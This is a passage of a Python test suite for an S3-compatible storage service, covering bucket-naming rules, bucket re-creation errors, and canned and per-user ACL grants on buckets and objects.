# tests using this with a custom prefix are responsible for doing
# their own setup/teardown nukes, with their custom prefix; this
# should be very rare
prefix = get_new_bucket_name()
assert len(prefix) < 63
num = length - len(prefix)
name=num*'a'
bucket_name = '{prefix}{name}'.format(
prefix=prefix,
name=name,
)
client = get_client()
response = client.create_bucket(Bucket=bucket_name)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
# Breaks DNS with SubdomainCallingFormat
@attr('fails_with_subdomain')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/60 byte name')
@attr(assertion='fails with subdomain')
@attr('fails_on_aws') # <Error><Code>InvalidBucketName</Code><Message>The specified bucket is not valid.</Message>...</Error>
# Should now pass on AWS even though it has 'fails_on_aws' attr.
def test_bucket_create_naming_good_long_60():
_test_bucket_create_naming_good_long(60)
# Breaks DNS with SubdomainCallingFormat
@attr('fails_with_subdomain')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/61 byte name')
@attr(assertion='fails with subdomain')
@attr('fails_on_aws') # <Error><Code>InvalidBucketName</Code><Message>The specified bucket is not valid.</Message>...</Error>
# Should now pass on AWS even though it has 'fails_on_aws' attr.
def test_bucket_create_naming_good_long_61():
_test_bucket_create_naming_good_long(61)
# Breaks DNS with SubdomainCallingFormat
@attr('fails_with_subdomain')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/62 byte name')
@attr(assertion='fails with subdomain')
@attr('fails_on_aws') # <Error><Code>InvalidBucketName</Code><Message>The specified bucket is not valid.</Message>...</Error>
# Should now pass on AWS even though it has 'fails_on_aws' attr.
def test_bucket_create_naming_good_long_62():
_test_bucket_create_naming_good_long(62)
# Breaks DNS with SubdomainCallingFormat
@attr('fails_with_subdomain')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/63 byte name')
@attr(assertion='fails with subdomain')
def test_bucket_create_naming_good_long_63():
_test_bucket_create_naming_good_long(63)
# Breaks DNS with SubdomainCallingFormat
@attr('fails_with_subdomain')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list w/61 byte name')
@attr(assertion='fails with subdomain')
@attr('fails_on_aws') # <Error><Code>InvalidBucketName</Code><Message>The specified bucket is not valid.</Message>...</Error>
# Should now pass on AWS even though it has 'fails_on_aws' attr.
def test_bucket_list_long_name():
prefix = get_new_bucket_name()
length = 61
num = length - len(prefix)
name=num*'a'
bucket_name = '{prefix}{name}'.format(
prefix=prefix,
name=name,
)
bucket = get_new_bucket_resource(name=bucket_name)
is_empty = _bucket_is_empty(bucket)
eq(is_empty, True)
# AWS does not enforce all documented bucket restrictions.
# http://docs.amazonwebservices.com/AmazonS3/2006-03-01/dev/index.html?BucketRestrictions.html
@attr('fails_on_aws')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/ip address for name')
@attr(assertion='fails on aws')
def test_bucket_create_naming_bad_ip():
check_bad_bucket_name('192.168.5.123')
# Breaks DNS with SubdomainCallingFormat
@attr('fails_with_subdomain')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/! in name')
@attr(assertion='fails with subdomain')
# TODO: remove this fails_on_rgw when I fix it
@attr('fails_on_rgw')
def test_bucket_create_naming_bad_punctuation():
# characters other than [a-zA-Z0-9._-]
invalid_bucketname = 'alpha!soup'
status, error_code = check_invalid_bucketname(invalid_bucketname)
# TODO: figure out why a 403 is coming out in boto3 but not in boto2.
eq(status, 400)
eq(error_code, 'InvalidBucketName')
# test_bucket_create_naming_dns_* are valid but not recommended
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/underscore in name')
@attr(assertion='fails')
@attr('fails_on_aws') # <Error><Code>InvalidBucketName</Code><Message>The specified bucket is not valid.</Message>...</Error>
# Should now pass on AWS even though it has 'fails_on_aws' attr.
def test_bucket_create_naming_dns_underscore():
invalid_bucketname = 'foo_bar'
status, error_code = check_invalid_bucketname(invalid_bucketname)
eq(status, 400)
eq(error_code, 'InvalidBucketName')
# Breaks DNS with SubdomainCallingFormat
@attr('fails_with_subdomain')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/100 byte name')
@attr(assertion='fails with subdomain')
@attr('fails_on_aws') # <Error><Code>InvalidBucketName</Code><Message>The specified bucket is not valid.</Message>...</Error>
def test_bucket_create_naming_dns_long():
prefix = get_prefix()
assert len(prefix) < 50
num = 63 - len(prefix)
check_good_bucket_name(num * 'a')
# Breaks DNS with SubdomainCallingFormat
@attr('fails_with_subdomain')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/dash at end of name')
@attr(assertion='fails')
@attr('fails_on_aws') # <Error><Code>InvalidBucketName</Code><Message>The specified bucket is not valid.</Message>...</Error>
# Should now pass on AWS even though it has 'fails_on_aws' attr.
def test_bucket_create_naming_dns_dash_at_end():
invalid_bucketname = 'foo-'
status, error_code = check_invalid_bucketname(invalid_bucketname)
eq(status, 400)
eq(error_code, 'InvalidBucketName')
# Breaks DNS with SubdomainCallingFormat
@attr('fails_with_subdomain')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/.. in name')
@attr(assertion='fails')
@attr('fails_on_aws') # <Error><Code>InvalidBucketName</Code><Message>The specified bucket is not valid.</Message>...</Error>
# Should now pass on AWS even though it has 'fails_on_aws' attr.
def test_bucket_create_naming_dns_dot_dot():
invalid_bucketname = 'foo..bar'
status, error_code = check_invalid_bucketname(invalid_bucketname)
eq(status, 400)
eq(error_code, 'InvalidBucketName')
# Breaks DNS with SubdomainCallingFormat
@attr('fails_with_subdomain')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/.- in name')
@attr(assertion='fails')
@attr('fails_on_aws') # <Error><Code>InvalidBucketName</Code><Message>The specified bucket is not valid.</Message>...</Error>
# Should now pass on AWS even though it has 'fails_on_aws' attr.
def test_bucket_create_naming_dns_dot_dash():
invalid_bucketname = 'foo.-bar'
status, error_code = check_invalid_bucketname(invalid_bucketname)
eq(status, 400)
eq(error_code, 'InvalidBucketName')
# Breaks DNS with SubdomainCallingFormat
@attr('fails_with_subdomain')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/-. in name')
@attr(assertion='fails')
@attr('fails_on_aws') # <Error><Code>InvalidBucketName</Code><Message>The specified bucket is not valid.</Message>...</Error>
# Should now pass on AWS even though it has 'fails_on_aws' attr.
def test_bucket_create_naming_dns_dash_dot():
invalid_bucketname = 'foo-.bar'
status, error_code = check_invalid_bucketname(invalid_bucketname)
eq(status, 400)
eq(error_code, 'InvalidBucketName')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='re-create')
def test_bucket_create_exists():
# aws-s3 default region allows recreation of buckets
# but all other regions fail with BucketAlreadyOwnedByYou.
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name)
try:
response = client.create_bucket(Bucket=bucket_name)
except ClientError as e:
status, error_code = _get_status_and_error_code(e.response)
eq(e.status, 409)
eq(e.error_code, 'BucketAlreadyOwnedByYou')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='get location')
def test_bucket_get_location():
location_constraint = get_main_api_name()
if not location_constraint:
raise SkipTest
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, CreateBucketConfiguration={'LocationConstraint': location_constraint})
response = client.get_bucket_location(Bucket=bucket_name)
if location_constraint == "":
location_constraint = None
eq(response['LocationConstraint'], location_constraint)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='re-create by non-owner')
@attr(assertion='fails 409')
def test_bucket_create_exists_nonowner():
# Names are shared across a global namespace. As such, no two
# users can create a bucket with that same name.
bucket_name = get_new_bucket_name()
client = get_client()
alt_client = get_alt_client()
client.create_bucket(Bucket=bucket_name)
e = assert_raises(ClientError, alt_client.create_bucket, Bucket=bucket_name)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 409)
eq(error_code, 'BucketAlreadyExists')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='re-create with existing acl')
@attr(assertion='fails 409')
def test_bucket_recreate_overwrite_acl():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ACL='public-read')
e = assert_raises(ClientError, client.create_bucket, Bucket=bucket_name)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 409)
eq(error_code, 'BucketAlreadyExists')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='re-create with new acl')
@attr(assertion='fails 409')
def test_bucket_recreate_new_acl():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name)
e = assert_raises(ClientError, client.create_bucket, Bucket=bucket_name, ACL='public-read')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 409)
eq(error_code, 'BucketAlreadyExists')
def check_access_denied(fn, *args, **kwargs):
e = assert_raises(ClientError, fn, *args, **kwargs)
status = _get_status(e.response)
eq(status, 403)
def check_grants(got, want):
"""
Check that grants list in got matches the dictionaries in want,
in any order.
"""
eq(len(got), len(want))
for g, w in zip(got, want):
w = dict(w)
g = dict(g)
eq(g.pop('Permission', None), w['Permission'])
eq(g['Grantee'].pop('DisplayName', None), w['DisplayName'])
eq(g['Grantee'].pop('ID', None), w['ID'])
eq(g['Grantee'].pop('Type', None), w['Type'])
eq(g['Grantee'].pop('URI', None), w['URI'])
eq(g['Grantee'].pop('EmailAddress', None), w['EmailAddress'])
eq(g, {'Grantee': {}})
@attr(resource='bucket')
@attr(method='get')
@attr(operation='default acl')
@attr(assertion='read back expected defaults')
def test_bucket_acl_default():
bucket_name = get_new_bucket()
client = get_client()
response = client.get_bucket_acl(Bucket=bucket_name)
display_name = get_main_display_name()
user_id = get_main_user_id()
eq(response['Owner']['DisplayName'], display_name)
eq(response['Owner']['ID'], user_id)
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission='FULL_CONTROL',
ID=user_id,
DisplayName=display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='public-read acl')
@attr(assertion='read back expected defaults')
@attr('fails_on_aws') # <Error><Code>IllegalLocationConstraintException</Code><Message>The unspecified location constraint is incompatible for the region specific endpoint this request was sent to.</Message>
def test_bucket_acl_canned_during_create():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(ACL='public-read', Bucket=bucket_name)
response = client.get_bucket_acl(Bucket=bucket_name)
display_name = get_main_display_name()
user_id = get_main_user_id()
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission='READ',
ID=None,
DisplayName=None,
URI='http://acs.amazonaws.com/groups/global/AllUsers',
EmailAddress=None,
Type='Group',
),
dict(
Permission='FULL_CONTROL',
ID=user_id,
DisplayName=display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='acl: public-read,private')
@attr(assertion='read back expected values')
def test_bucket_acl_canned():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(ACL='public-read', Bucket=bucket_name)
response = client.get_bucket_acl(Bucket=bucket_name)
display_name = get_main_display_name()
user_id = get_main_user_id()
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission='READ',
ID=None,
DisplayName=None,
URI='http://acs.amazonaws.com/groups/global/AllUsers',
EmailAddress=None,
Type='Group',
),
dict(
Permission='FULL_CONTROL',
ID=user_id,
DisplayName=display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
client.put_bucket_acl(ACL='private', Bucket=bucket_name)
response = client.get_bucket_acl(Bucket=bucket_name)
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission='FULL_CONTROL',
ID=user_id,
DisplayName=display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
@attr(resource='bucket.acls')
@attr(method='put')
@attr(operation='acl: public-read-write')
@attr(assertion='read back expected values')
def test_bucket_acl_canned_publicreadwrite():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(ACL='public-read-write', Bucket=bucket_name)
response = client.get_bucket_acl(Bucket=bucket_name)
display_name = get_main_display_name()
user_id = get_main_user_id()
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission='READ',
ID=None,
DisplayName=None,
URI='http://acs.amazonaws.com/groups/global/AllUsers',
EmailAddress=None,
Type='Group',
),
dict(
Permission='WRITE',
ID=None,
DisplayName=None,
URI='http://acs.amazonaws.com/groups/global/AllUsers',
EmailAddress=None,
Type='Group',
),
dict(
Permission='FULL_CONTROL',
ID=user_id,
DisplayName=display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='acl: authenticated-read')
@attr(assertion='read back expected values')
def test_bucket_acl_canned_authenticatedread():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(ACL='authenticated-read', Bucket=bucket_name)
response = client.get_bucket_acl(Bucket=bucket_name)
display_name = get_main_display_name()
user_id = get_main_user_id()
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission='READ',
ID=None,
DisplayName=None,
URI='http://acs.amazonaws.com/groups/global/AuthenticatedUsers',
EmailAddress=None,
Type='Group',
),
dict(
Permission='FULL_CONTROL',
ID=user_id,
DisplayName=display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
@attr(resource='object.acls')
@attr(method='get')
@attr(operation='default acl')
@attr(assertion='read back expected defaults')
def test_object_acl_default():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object_acl(Bucket=bucket_name, Key='foo')
display_name = get_main_display_name()
user_id = get_main_user_id()
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission='FULL_CONTROL',
ID=user_id,
DisplayName=display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
@attr(resource='object.acls')
@attr(method='put')
@attr(operation='acl public-read')
@attr(assertion='read back expected values')
def test_object_acl_canned_during_create():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(ACL='public-read', Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object_acl(Bucket=bucket_name, Key='foo')
display_name = get_main_display_name()
user_id = get_main_user_id()
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission='READ',
ID=None,
DisplayName=None,
URI='http://acs.amazonaws.com/groups/global/AllUsers',
EmailAddress=None,
Type='Group',
),
dict(
Permission='FULL_CONTROL',
ID=user_id,
DisplayName=display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
@attr(resource='object.acls')
@attr(method='put')
@attr(operation='acl public-read,private')
@attr(assertion='read back expected values')
def test_object_acl_canned():
bucket_name = get_new_bucket()
client = get_client()
# Since it defaults to private, set it public-read first
client.put_object(ACL='public-read', Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object_acl(Bucket=bucket_name, Key='foo')
display_name = get_main_display_name()
user_id = get_main_user_id()
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission='READ',
ID=None,
DisplayName=None,
URI='http://acs.amazonaws.com/groups/global/AllUsers',
EmailAddress=None,
Type='Group',
),
dict(
Permission='FULL_CONTROL',
ID=user_id,
DisplayName=display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
# Then back to private.
client.put_object_acl(ACL='private',Bucket=bucket_name, Key='foo')
response = client.get_object_acl(Bucket=bucket_name, Key='foo')
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission='FULL_CONTROL',
ID=user_id,
DisplayName=display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
@attr(resource='object')
@attr(method='put')
@attr(operation='acl public-read-write')
@attr(assertion='read back expected values')
def test_object_acl_canned_publicreadwrite():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(ACL='public-read-write', Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object_acl(Bucket=bucket_name, Key='foo')
display_name = get_main_display_name()
user_id = get_main_user_id()
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission='READ',
ID=None,
DisplayName=None,
URI='http://acs.amazonaws.com/groups/global/AllUsers',
EmailAddress=None,
Type='Group',
),
dict(
Permission='WRITE',
ID=None,
DisplayName=None,
URI='http://acs.amazonaws.com/groups/global/AllUsers',
EmailAddress=None,
Type='Group',
),
dict(
Permission='FULL_CONTROL',
ID=user_id,
DisplayName=display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
@attr(resource='object.acls')
@attr(method='put')
@attr(operation='acl authenticated-read')
@attr(assertion='read back expected values')
def test_object_acl_canned_authenticatedread():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(ACL='authenticated-read', Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object_acl(Bucket=bucket_name, Key='foo')
display_name = get_main_display_name()
user_id = get_main_user_id()
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission='READ',
ID=None,
DisplayName=None,
URI='http://acs.amazonaws.com/groups/global/AuthenticatedUsers',
EmailAddress=None,
Type='Group',
),
dict(
Permission='FULL_CONTROL',
ID=user_id,
DisplayName=display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
@attr(resource='object.acls')
@attr(method='put')
@attr(operation='acl bucket-owner-read')
@attr(assertion='read back expected values')
def test_object_acl_canned_bucketownerread():
bucket_name = get_new_bucket_name()
main_client = get_client()
alt_client = get_alt_client()
main_client.create_bucket(Bucket=bucket_name, ACL='public-read-write')
alt_client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
bucket_acl_response = main_client.get_bucket_acl(Bucket=bucket_name)
bucket_owner_id = bucket_acl_response['Grants'][2]['Grantee']['ID']
bucket_owner_display_name = bucket_acl_response['Grants'][2]['Grantee']['DisplayName']
alt_client.put_object(ACL='bucket-owner-read', Bucket=bucket_name, Key='foo')
response = alt_client.get_object_acl(Bucket=bucket_name, Key='foo')
alt_display_name = get_alt_display_name()
alt_user_id = get_alt_user_id()
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission='FULL_CONTROL',
ID=alt_user_id,
DisplayName=alt_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
dict(
Permission='READ',
ID=bucket_owner_id,
DisplayName=bucket_owner_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
@attr(resource='object.acls')
@attr(method='put')
@attr(operation='acl bucket-owner-read')
@attr(assertion='read back expected values')
def test_object_acl_canned_bucketownerfullcontrol():
bucket_name = get_new_bucket_name()
main_client = get_client()
alt_client = get_alt_client()
main_client.create_bucket(Bucket=bucket_name, ACL='public-read-write')
alt_client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
bucket_acl_response = main_client.get_bucket_acl(Bucket=bucket_name)
bucket_owner_id = bucket_acl_response['Grants'][2]['Grantee']['ID']
bucket_owner_display_name = bucket_acl_response['Grants'][2]['Grantee']['DisplayName']
alt_client.put_object(ACL='bucket-owner-full-control', Bucket=bucket_name, Key='foo')
response = alt_client.get_object_acl(Bucket=bucket_name, Key='foo')
alt_display_name = get_alt_display_name()
alt_user_id = get_alt_user_id()
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission='FULL_CONTROL',
ID=alt_user_id,
DisplayName=alt_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
dict(
Permission='FULL_CONTROL',
ID=bucket_owner_id,
DisplayName=bucket_owner_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
@attr(resource='object.acls')
@attr(method='put')
@attr(operation='set write-acp')
@attr(assertion='does not modify owner')
@attr('fails_on_aws') # <Error><Code>InvalidArgument</Code><Message>Invalid id</Message><ArgumentName>CanonicalUser/ID</ArgumentName><ArgumentValue>${ALTUSER}</ArgumentValue>
def test_object_acl_full_control_verify_owner():
bucket_name = get_new_bucket_name()
main_client = get_client()
alt_client = get_alt_client()
main_client.create_bucket(Bucket=bucket_name, ACL='public-read-write')
main_client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
alt_user_id = get_alt_user_id()
alt_display_name = get_alt_display_name()
main_user_id = get_main_user_id()
main_display_name = get_main_display_name()
grant = { 'Grants': [{'Grantee': {'ID': alt_user_id, 'Type': 'CanonicalUser' }, 'Permission': 'FULL_CONTROL'}], 'Owner': {'DisplayName': main_display_name, 'ID': main_user_id}}
main_client.put_object_acl(Bucket=bucket_name, Key='foo', AccessControlPolicy=grant)
grant = { 'Grants': [{'Grantee': {'ID': alt_user_id, 'Type': 'CanonicalUser' }, 'Permission': 'READ_ACP'}], 'Owner': {'DisplayName': main_display_name, 'ID': main_user_id}}
alt_client.put_object_acl(Bucket=bucket_name, Key='foo', AccessControlPolicy=grant)
response = alt_client.get_object_acl(Bucket=bucket_name, Key='foo')
eq(response['Owner']['ID'], main_user_id)
def add_obj_user_grant(bucket_name, key, grant):
"""
Adds a grant to the existing grants meant to be passed into
the AccessControlPolicy argument of put_object_acls for an object
owned by the main user, not the alt user
A grant is a dictionary in the form of:
{u'Grantee': {u'Type': 'type', u'DisplayName': 'name', u'ID': 'id'}, u'Permission': 'PERM'}
"""
client = get_client()
main_user_id = get_main_user_id()
main_display_name = get_main_display_name()
response = client.get_object_acl(Bucket=bucket_name, Key=key)
grants = response['Grants']
grants.append(grant)
grant = {'Grants': grants, 'Owner': {'DisplayName': main_display_name, 'ID': main_user_id}}
return grant
@attr(resource='object.acls')
@attr(method='put')
@attr(operation='set write-acp')
@attr(assertion='does not modify other attributes')
def test_object_acl_full_control_verify_attributes():
bucket_name = get_new_bucket_name()
main_client = get_client()
alt_client = get_alt_client()
main_client.create_bucket(Bucket=bucket_name, ACL='public-read-write')
header = {'x-amz-foo': 'bar'}
# lambda to add any header
add_header = (lambda **kwargs: kwargs['params']['headers'].update(header))
main_client.meta.events.register('before-call.s3.PutObject', add_header)
main_client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = main_client.get_object(Bucket=bucket_name, Key='foo')
content_type = response['ContentType']
etag = response['ETag']
alt_user_id = get_alt_user_id()
grant = {'Grantee': {'ID': alt_user_id, 'Type': 'CanonicalUser' }, 'Permission': 'FULL_CONTROL'}
grants = add_obj_user_grant(bucket_name, 'foo', grant)
main_client.put_object_acl(Bucket=bucket_name, Key='foo', AccessControlPolicy=grants)
response = main_client.get_object(Bucket=bucket_name, Key='foo')
eq(content_type, response['ContentType'])
eq(etag, response['ETag'])
@attr(resource='bucket')
@attr(method='ACLs')
@attr(operation='set acl private')
@attr(assertion='a private object can be set to private')
def test_bucket_acl_canned_private_to_private():
bucket_name = get_new_bucket()
client = get_client()
response = client.put_bucket_acl(Bucket=bucket_name, ACL='private')
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
def add_bucket_user_grant(bucket_name, grant):
"""
Adds a grant to the existing grants meant to be passed into
the AccessControlPolicy argument of put_object_acls for an object
owned by the main user, not the alt user
A grant is a dictionary in the form of:
{u'Grantee': {u'Type': 'type', u'DisplayName': 'name', u'ID': 'id'}, u'Permission': 'PERM'}
"""
client = get_client()
main_user_id = get_main_user_id()
main_display_name = get_main_display_name()
response = client.get_bucket_acl(Bucket=bucket_name)
grants = response['Grants']
grants.append(grant)
grant = {'Grants': grants, 'Owner': {'DisplayName': main_display_name, 'ID': main_user_id}}
return grant
def _check_object_acl(permission):
"""
Sets the permission on an object then checks to see
if it was set
"""
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object_acl(Bucket=bucket_name, Key='foo')
policy = {}
policy['Owner'] = response['Owner']
policy['Grants'] = response['Grants']
policy['Grants'][0]['Permission'] = permission
client.put_object_acl(Bucket=bucket_name, Key='foo', AccessControlPolicy=policy)
response = client.get_object_acl(Bucket=bucket_name, Key='foo')
grants = response['Grants']
main_user_id = get_main_user_id()
main_display_name = get_main_display_name()
check_grants(
grants,
[
dict(
Permission=permission,
ID=main_user_id,
DisplayName=main_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='set acl FULL_CONTRO')
@attr(assertion='reads back correctly')
@attr('fails_on_aws') # <Error><Code>InvalidArgument</Code><Message>Invalid id</Message><ArgumentName>CanonicalUser/ID</ArgumentName><ArgumentValue>${USER}</ArgumentValue>
def test_object_acl():
_check_object_acl('FULL_CONTROL')
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='set acl WRITE')
@attr(assertion='reads back correctly')
@attr('fails_on_aws') # <Error><Code>InvalidArgument</Code><Message>Invalid id</Message><ArgumentName>CanonicalUser/ID</ArgumentName><ArgumentValue>${USER}</ArgumentValue>
def test_object_acl_write():
_check_object_acl('WRITE')
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='set acl WRITE_ACP')
@attr(assertion='reads back correctly')
@attr('fails_on_aws') # <Error><Code>InvalidArgument</Code><Message>Invalid id</Message><ArgumentName>CanonicalUser/ID</ArgumentName><ArgumentValue>${USER}</ArgumentValue>
def test_object_acl_writeacp():
_check_object_acl('WRITE_ACP')
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='set acl READ')
@attr(assertion='reads back correctly')
@attr('fails_on_aws') # <Error><Code>InvalidArgument</Code><Message>Invalid id</Message><ArgumentName>CanonicalUser/ID</ArgumentName><ArgumentValue>${USER}</ArgumentValue>
def test_object_acl_read():
_check_object_acl('READ')
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='set acl READ_ACP')
@attr(assertion='reads back correctly')
@attr('fails_on_aws') # <Error><Code>InvalidArgument</Code><Message>Invalid id</Message><ArgumentName>CanonicalUser/ID</ArgumentName><ArgumentValue>${USER}</ArgumentValue>
def test_object_acl_readacp():
_check_object_acl('READ_ACP')
def _bucket_acl_grant_userid(permission):
"""
create a new bucket, grant a specific user the specified
permission, read back the acl and verify correct setting
"""
bucket_name = get_new_bucket()
client = get_client()
main_user_id = get_main_user_id()
main_display_name = get_main_display_name()
alt_user_id = get_alt_user_id()
alt_display_name = get_alt_display_name()
grant = {'Grantee': {'ID': alt_user_id, 'Type': 'CanonicalUser' }, 'Permission': permission}
grant = add_bucket_user_grant(bucket_name, grant)
client.put_bucket_acl(Bucket=bucket_name, AccessControlPolicy=grant)
response = client.get_bucket_acl(Bucket=bucket_name)
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission=permission,
ID=alt_user_id,
DisplayName=alt_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
dict(
Permission='FULL_CONTROL',
ID=main_user_id,
DisplayName=main_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
return bucket_name
def _check_bucket_acl_grant_can_read(bucket_name):
"""
verify ability to read the specified bucket
"""
alt_client = get_alt_client()
response = alt_client.head_bucket(Bucket=bucket_name)
def _check_bucket_acl_grant_cant_read(bucket_name):
"""
verify inability to read the specified bucket
"""
alt_client = get_alt_client()
check_access_denied(alt_client.head_bucket, Bucket=bucket_name)
def _check_bucket_acl_grant_can_readacp(bucket_name):
"""
verify ability to read acls on specified bucket
"""
alt_client = get_alt_client()
alt_client.get_bucket_acl(Bucket=bucket_name)
def _check_bucket_acl_grant_cant_readacp(bucket_name):
"""
verify inability to read acls on specified bucket
"""
alt_client = get_alt_client()
check_access_denied(alt_client.get_bucket_acl, Bucket=bucket_name)
def _check_bucket_acl_grant_can_write(bucket_name):
"""
verify ability to write the specified bucket
"""
alt_client = get_alt_client()
alt_client.put_object(Bucket=bucket_name, Key='foo-write', Body='bar')
def _check_bucket_acl_grant_cant_write(bucket_name):
"""
verify inability to write the specified bucket
"""
alt_client = get_alt_client()
check_access_denied(alt_client.put_object, Bucket=bucket_name, Key='foo-write', Body='bar')
def _check_bucket_acl_grant_can_writeacp(bucket_name):
"""
verify ability to set acls on the specified bucket
"""
alt_client = get_alt_client()
alt_client.put_bucket_acl(Bucket=bucket_name, ACL='public-read')
def _check_bucket_acl_grant_cant_writeacp(bucket_name):
"""
verify inability to set acls on the specified bucket
"""
alt_client = get_alt_client()
check_access_denied(alt_client.put_bucket_acl,Bucket=bucket_name, ACL='public-read')
@attr(resource='bucket')
@attr(method='ACLs')
@attr(operation='set acl w/userid FULL_CONTROL')
@attr(assertion='can read/write data/acls')
@attr('fails_on_aws') # <Error><Code>InvalidArgument</Code><Message>Invalid id</Message><ArgumentName>CanonicalUser/ID</ArgumentName><ArgumentValue>${USER}</ArgumentValue>
def test_bucket_acl_grant_userid_fullcontrol():
bucket_name = _bucket_acl_grant_userid('FULL_CONTROL')
# alt user can read
_check_bucket_acl_grant_can_read(bucket_name)
# can read acl
_check_bucket_acl_grant_can_readacp(bucket_name)
# can write
_check_bucket_acl_grant_can_write(bucket_name)
# can write acl
_check_bucket_acl_grant_can_writeacp(bucket_name)
client = get_client()
bucket_acl_response = client.get_bucket_acl(Bucket=bucket_name)
owner_id = bucket_acl_response['Owner']['ID']
owner_display_name = bucket_acl_response['Owner']['DisplayName']
main_display_name = get_main_display_name()
main_user_id = get_main_user_id()
eq(owner_id, main_user_id)
eq(owner_display_name, main_display_name)
@attr(resource='bucket')
@attr(method='ACLs')
@attr(operation='set acl w/userid READ')
@attr(assertion='can read data, no other r/w')
@attr('fails_on_aws') # <Error><Code>InvalidArgument</Code><Message>Invalid id</Message><ArgumentName>CanonicalUser/ID</ArgumentName><ArgumentValue>${ALTUSER}</ArgumentValue>
def test_bucket_acl_grant_userid_read():
bucket_name = _bucket_acl_grant_userid('READ')
# alt user can read
_check_bucket_acl_grant_can_read(bucket_name)
# can't read acl
_check_bucket_acl_grant_cant_readacp(bucket_name)
# can't write
_check_bucket_acl_grant_cant_write(bucket_name)
# can't write acl
_check_bucket_acl_grant_cant_writeacp(bucket_name)
@attr(resource='bucket')
@attr(method='ACLs')
@attr(operation='set acl w/userid READ_ACP')
@attr(assertion='can read acl, no other r/w')
